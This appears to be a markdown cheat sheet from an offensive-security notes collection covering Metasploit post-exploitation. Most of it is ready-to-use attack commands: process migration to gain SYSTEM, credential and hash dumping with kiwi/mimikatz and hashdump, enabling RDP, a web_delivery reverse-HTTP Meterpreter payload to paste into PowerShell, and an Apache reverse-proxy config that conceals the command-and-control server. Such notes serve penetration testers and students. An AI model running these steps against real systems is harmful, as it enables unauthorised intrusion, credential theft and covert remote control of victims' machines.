killchain-compendium/Post Exploitation/Metasploit.md

Metasploit

• -j Run job in background
• sessions -i 1 interactive session 1

Meterpreter

• CheatSheet
• Upgrade shell

post/multi/manage/shell_to_meterpreter

• execute command
• search files
• download and upload files

Metasploit after gaining foothold

• Meterpreter shell is opened on target. Run exploit suggester

run post/multi/recon/local_exploit_suggester

• Decide on your exploit and background the meterpreter.
• Use the exploit.

use <path/to/exploit>

• Fill options like session and run the exploit

Privilege Escalation on Windows Using Metasploit

• Find process with higher privs and migrate to it. Example spoolsv.exe.

migrate -N spoolsv.exe

• After NT AUTHORITY\SYSTEM is gained start mimikatz. and dump all creds

load kiwi
help
creds_all

• Enable RDP via run post/windows/manage/enable_rdp

Hashdump on Windows

• Meterpreter

run post/windows/gather/hashdump

load kiwi
lsa_dump_sam

Webdelivery

use exploit/multi/script/web_delivery
show targets
set LPORT <attacker-Port>
set PAYLOAD windows/meterpreter/reverse_http
run -j

• Copy into powershell/cmd

Reverse Proxy

• Hide behind reverse proxy, e.g. apache
• In case of an apache, these modules must be enabled
  • rewrite
  • proxy
  • proxy_http
  • headers
• Use User-Agent to identify targets

<VirtualHost *:80>

	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html

	RewriteEngine On
	RewriteCond %{HTTP_USER_AGENT} "^User-Agent$"
	ProxyPass "/" "http://localhost:8080/"

	<Directory>
		AllowOverride All
	</Directory>

	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>